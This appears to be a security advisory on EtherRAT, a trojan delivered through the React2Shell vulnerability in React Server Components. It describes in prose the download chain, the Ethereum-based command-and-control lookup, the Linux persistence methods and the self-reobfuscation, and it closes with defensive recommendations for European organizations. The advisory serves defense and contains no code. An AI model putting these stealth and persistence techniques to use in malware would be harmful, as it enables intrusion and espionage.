The threat actors, likely affiliated with North Korea, have leveraged the recently disclosed critical vulnerability CVE-2025-55182 (React2Shell) in React Server Components (RSC) to deploy a novel remote access trojan named EtherRAT. This vulnerability allows unauthenticated remote code execution with a CVSS score of 10.0, enabling attackers to run arbitrary shell commands on vulnerable servers. The attack chain begins by executing a Base64-encoded shell command that downloads and runs a shell script using curl, wget, or python3 as fallback methods. This script prepares the environment by downloading Node.js v20.10.0 from the official source and writes an encrypted payload and obfuscated JavaScript dropper to disk. The dropper decrypts the EtherRAT payload with a hard-coded key and launches it using the downloaded Node.js runtime. EtherRAT’s command-and-control infrastructure is uniquely designed to leverage Ethereum smart contracts for C2 URL resolution, querying nine public Ethereum RPC endpoints in parallel and using majority consensus to determine the legitimate C2 server address. This mechanism protects against single-point compromises and researcher takedowns. Once connected, EtherRAT polls the C2 every 500 milliseconds, executing JavaScript commands longer than 10 characters on the infected host. Persistence is achieved through five distinct Linux mechanisms: systemd user services, XDG autostart entries, cron jobs, .bashrc injection, and profile injection, ensuring survival across reboots. The malware also features a self-update capability that replaces its code with functionally identical but differently obfuscated versions to evade static detection. EtherRAT is linked to the Contagious Interview campaign, which targets blockchain and Web3 developers through social engineering involving fake job interviews and coding tasks distributed via platforms like LinkedIn, Upwork, and Fiverr. This campaign has evolved to exploit npm ecosystem vulnerabilities and now also abuses VS Code’s auto-run task feature to execute malicious scripts. The campaign’s focus on JavaScript and cryptocurrency-related workflows, combined with the advanced stealth and persistence techniques of EtherRAT, marks a significant escalation in threat actor capabilities exploiting React2Shell.

European organizations involved in software development, especially those working with JavaScript, Node.js, blockchain, and Web3 technologies, face significant risks from this threat. The exploitation of a critical unauthenticated RCE vulnerability in React Server Components can lead to full system compromise, enabling attackers to execute arbitrary code, steal sensitive intellectual property, and maintain persistent access. The use of Ethereum smart contracts for C2 resolution complicates detection and takedown efforts, increasing the likelihood of prolonged undetected intrusions. The multi-pronged persistence mechanisms ensure that even after reboots or partial remediation, the malware remains active. Organizations in sectors such as fintech, blockchain startups, software development firms, and cloud service providers are particularly vulnerable. The social engineering vector targeting developers via professional platforms increases the attack surface and the risk of initial compromise. The malware’s ability to self-update and obfuscate payloads challenges traditional signature-based defenses, potentially leading to widespread infections and data breaches. Additionally, the stealthy nature of EtherRAT and its frequent polling for commands can facilitate espionage, data exfiltration, and lateral movement within networks, severely impacting confidentiality, integrity, and availability of critical systems.

European organizations should prioritize patching all React Server Components to remediate CVE-2025-55182 immediately, ensuring no vulnerable versions remain in production or development environments. Implement strict network segmentation and monitoring to detect unusual outbound connections, especially those querying Ethereum RPC endpoints or exhibiting high-frequency polling behavior. Deploy advanced endpoint detection and response (EDR) solutions capable of behavioral analysis to identify obfuscated JavaScript execution and persistence mechanisms such as systemd service creation, cron job modifications, and shell profile injections. Enforce multi-factor authentication and least privilege principles on developer platforms and internal systems to reduce the risk of credential theft and lateral movement. Conduct targeted security awareness training for developers and HR teams to recognize and report suspicious recruitment activities and social engineering attempts on platforms like LinkedIn, Upwork, and Fiverr. Utilize threat intelligence feeds to monitor for indicators of compromise related to EtherRAT and the Contagious Interview campaign. Regularly audit and harden Node.js runtime environments, restricting downloads from untrusted sources. Employ application allowlisting and script-blocking policies to prevent unauthorized execution of scripts and binaries. Finally, establish incident response playbooks specifically addressing React2Shell exploitation and Ethereum-based C2 communications to enable rapid containment and remediation.